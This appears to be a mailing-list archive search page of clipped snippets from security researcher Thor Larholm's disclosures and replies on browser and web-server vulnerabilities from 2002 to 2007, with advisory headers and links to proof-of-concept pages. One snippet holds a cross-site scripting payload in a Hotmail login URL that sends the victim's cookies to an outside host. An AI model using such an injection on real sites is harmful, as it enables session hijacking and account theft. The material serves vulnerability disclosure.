2.0.
http://larholm.com/2007/07/26/thunderbird-15-has-not-been-patched-with-osint/
Regards
Thor Larholm
Thor Larholm wrote:
The Mozilla application platform currently has an unpatched input
validation flaw which allows you to specify arbitrary command line
arguments to any registered URL
with the report and the XPI exploits can be found at
http://larholm.com/media/2007/7/mozillaprotocolabuse.zip
Cheers
Thor Larholm
handler. The
full advisory and a working Proof of Concept exploit can be found at
http://larholm.com/2007/07/10/internet-explorer-0day-exploit/
Cheers
Thor Larholm
interaction simply by visiting a webpage. The full advisory and a
working Proof of Concept exploit can be found at
http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/
Cheers
Thor Larholm
--
I call dibs on the first SafariWin bug
-execution/
Cheers
Thor Larholm
is that you can still read some local files on Windows
and all user accessible files on Linux/Unix/OS X, with all user
accessible files potentially readable as well on Windows through the
patch regression.
http://larholm.com/2007/06/04/unpatched-input-validation-flaw-in-firefox-2004/
Cheers
Thor
of Firebug should also prevent any closely related
vulnerabilities as Joe has updated his domplate constructors to
forcefully escape all strings before they are inserted into the
console HTML.
Cheers
Thor Larholm
On 4/4/07, pdp (architect) [EMAIL PROTECTED] wrote:
http://www.gnucitizen.org/blog
allows you to overwrite native DOM methods on a thirdparty domain,
broadening the potential attack scope by allowing you to interfere with
the operations of existing script code inside that thirdparty document.
--
Thor Larholm
PolyPath, CSO
covers the broader picture. I
guess the cat is out of the bag now, might as well release that soon ;)
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
-Original Message-
From: Richard M. Smith [mailto:[EMAIL PROTECTED]
Sent: Monday, August 04, 2003 11:58 AM
crashing svchost. Of course,
this is only with the new return addresses that are not tied to any
specific servicepack..
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
-Original Message-
From: khan rohail [mailto:[EMAIL PROTECTED]
Sent: Monday, July 28, 2003 8:34 AM
, both on a
webpage and in an email - even with scripting disabled in the Restricted
Zone, which has so far been a major mitigating factor. This means that an
emailborne exploit would execute immediately when a user opened or previewed
an HTML-based email.
Regards
Thor Larholm
PivX Solutions, LLC
Thor Larholm security advisory TL#006
-
16 July 2003
HTML format: http://pivx.com/larholm/adv/TL006
Topic: ISA Server HTTP error handler XSS.
Discovery date: 25 June 2002.
Severity: Medium
Affected applications:
--
Any Microsoft
exploitable on websites.
Since MHT files are opened automatically, just like certain other media
files, you can also open an MHT file automatically through an email message
in the Restricted Zone.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
the Internet Zone for viewing HTML mail? If so, it is
also still vulnerable to the codeBase command execution vulnerability, like
any other application that is embedding MSHTML.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-Vendor Unreal Engine
directly against the best
interest and security of its own customers.
Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
Latest PivX research: Multi-Vendor Unreal Engine Advisory
http://www.pivx.com/press_releases/ueng-adv_pr.html
as severe.
http://www.pivx.com/larholm/unpatched/
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Strike Now, StrikeFirst!
http://www.pivx.com/sf.html
This is just a copy of Andreas Sandblads advisory, with a new command :)
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Strike Now, StrikeFirst!
http://www.pivx.com/sf.html
-Original Message-
From: Alan Rouse [mailto:[EMAIL PROTECTED]]
Sent: 11. november 2002 17:22
Monitoring which pages a user visits is also possible, and in general there
seems to be some oversights in this otherwise smooth rewrite.
Add to that some of the more odd bugs functionalitywise, and I would say
there is room for a beta 2 ;)
Regards
Thor Larholm, Security Researcher
PivX
zones.
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http://www.PivX.com
-Original Message-
From: Andreas Sandblad [mailto:sandblad;acc.umu.se]
Sent: 6. november 2002 20:48
To: [EMAIL PROTECTED]
Subject: How to execute programs with parameters in IE
method and object. At first, I assumed
they had made a generic fix, but with this in the open it is clear that they
only patched specifics and that there will be many more vulnerabilities in
the method/object caching category.
Regards
Thor Larholm
This is not a vulnerability or even privacy exposure in MSN, but just a
demonstration of zone spoofing by using the %2F encoding bug.
All the exposed MSN contact list and information is intentionally, and
safely, exposed in the My Computer zone.
Regards
Thor Larholm, Security Researcher
PivX
.law5.hotmail.passport.com/cgi-bin/login?_lang=id=2fs=1cb=;sc
riptlocation.replace('http://jscript.dk/2002/10/sec/querystring.asp?$'.repl
ace('$',document.cookie));/scriptct=1033054530_setlang=,,-1,0
Regards
Thor Larholm
Jubii A/S - Internet Programmer
This also works in IE5.5 as well.
Besides reading cookies from arbitrary sites, this vulnerability also allows
local file reading and execution - when combined with the OBJECT
crossprotocol redirection vulnerability.
http://jscript.dk/2002/10/sec/SaveRefLocalFile.html
Regards
Thor Larholm
the minor version change 1.0 to 1.0.1, I have no idea about the amount of
issues that remain or that has been fixed so far.
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http://www.PivX.com
From: Nick FitzGerald [mailto:[EMAIL PROTECTED]]
Hi Thor,
Doesn't the following have similar implications to the issue in your
TL#002 advisory??
Hi Nick,
close but no cigar - yet. In its current state, this % encoding issue cannot
escape protocol boundaries, which means that it cannot go
allowed HTTP traffic on
(most often) port 80.
Out of plain curiosity, how is this fixed in IE6SP1 - as the Netscape team
fixed it by demanding both sites to set document.domain, regardless if one
is the parent?
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure?
http
case you are out of
luck.
If your vulnerability did not deal with OWC, then apologize my intrusion and
let me guess on a Content-Type/Content-Disposition variant - though your
suggested workaround would make no sense then :)
Regards
Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You
Thor Larholm, PivX, security advisory TL#003
-
By Thor Larholm, Denmark
10 July 2002
HTML format: http://www.PivX.com/larholm/adv/TL003/
Topic: IE allows universal Cross Domain Scripting.
Discovery date: 25 June 2002.
Severity: High
Affected applications
it quite
easy to e.g. execute arbitrary commands, undoubtedly a more fun
demonstration:
http://jscript.dk/Jumper/xploit/ftpfolderview.html
Status: 18 unpatched vulnerabilities.
http://jscript.dk/Unpatched/
Regards
Thor Larholm
Jubii A/S - Internet Programmer
not to be the only one who has discovered this fact. GreyMagic
Software have updated their advisory on the cssText vulnerability and
bundled a new example that works post MS02-023, which can be found at
http://sec.greymagic.com/adv/gm004-ie/
Regards
Thor Larholm
Jubii A/S - Internet Programmer
a list of 12 such. It can still be found at
http://jscript.dk/unpatched/
Just my .02 kroner of comments :)
Regards
Thor Larholm
Jubii A/S - Internet Programmer
files exist.
http://jscript.dk/2002/4/NS6Tests/LinkLocalFileDetect.asp
Regards
Thor Larholm
Jubii A/S - Internet Programmer
-Original Message-
From: GreyMagic Software [mailto:[EMAIL PROTECTED]]
Sent: 30. april 2002 03:11
To: NTBugtraq; Bugtraq
Subject: Reading local files in Netscape 6
that also works in moz1rc1 can be found at
http://jscript.dk/2002/4/NS6Tests/documentload.html
Regards
Thor Larholm
Jubii A/S - Internet Programmer
Thor Larholm security advisory TL#002
-
By Thor Larholm, Denmark.
16 April 2002
HTML Format: http://jscript.dk/adv/TL002/
Topic: IE allows universal Cross Site Scripting.
Discovery date: 18 March 2002.
Severity: High
Affected applications
Thor Larholm security advisory TL#001
-
By Thor Larholm, Denmark.
10 April 2002
HTML format: http://jscript.dk/adv/TL001/
Topic: IIS allows universal CrossSiteScripting.
Discovery date: 13 March 2002.
Severity: Medium
Affected applications
Further, the patch doesn't seem to work completely:
http://www.theregister.co.uk/content/4/24667.html
Though, in other cases, it works better than expected:
http://jscript.dk/unpatched/N280302-01.html
A revision of the patch may be in place.
Regards
Thor Larholm
Jubii A/S - Internet
ft was contacted on 4 December 2000.
Bug is considered to be a code quality bug, and will be adressed in a future SP
for IE.
--
Thor Larholm
37 matches
Mail list logo